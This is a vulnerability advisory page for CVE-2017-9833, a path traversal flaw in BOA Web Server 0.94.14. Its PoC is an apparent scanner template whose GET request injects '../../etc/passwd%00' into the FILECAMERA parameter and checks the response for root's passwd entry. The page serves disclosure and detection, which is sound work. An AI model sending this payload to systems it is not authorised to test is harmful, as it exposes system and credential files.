CVE-2017-9833: BOA Web Server 0.94.14 - Arbitrary File Access

2025-08-01 BOA Web Server PoC Public

Description

BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.

PoC

id: CVE-2017-9833

info:
  name: BOA Web Server 0.94.14 - Arbitrary File Access
  author: 0x_Akoko
  severity: high
  description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.
  impact: |
    An attacker can gain unauthorized access to sensitive files on the server.
  remediation: |
    Upgrade to a patched version of BOA Web Server or apply the necessary security patches.
  reference:
    - https://www.exploit-db.com/exploits/42290
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9833
    - https://pastebin.com/raw/rt7LJvyF
    - https://www.exploit-db.com/exploits/42290/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-9833
    cwe-id: CWE-22
    epss-score: 0.68464
    epss-percentile: 0.99298
    cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: boa
    product: boa
  tags: cve,cve2017,boa,lfr,lfi,edb,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a9dd2632a216dbb33f1bcb32a1aa187efdf7dcfa87bab591588a418e62cab04d022100a32c9d7d08c3e8b78da79bbf8a7645001c56f98d1f0c0adbea7e618a6fe4c872:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities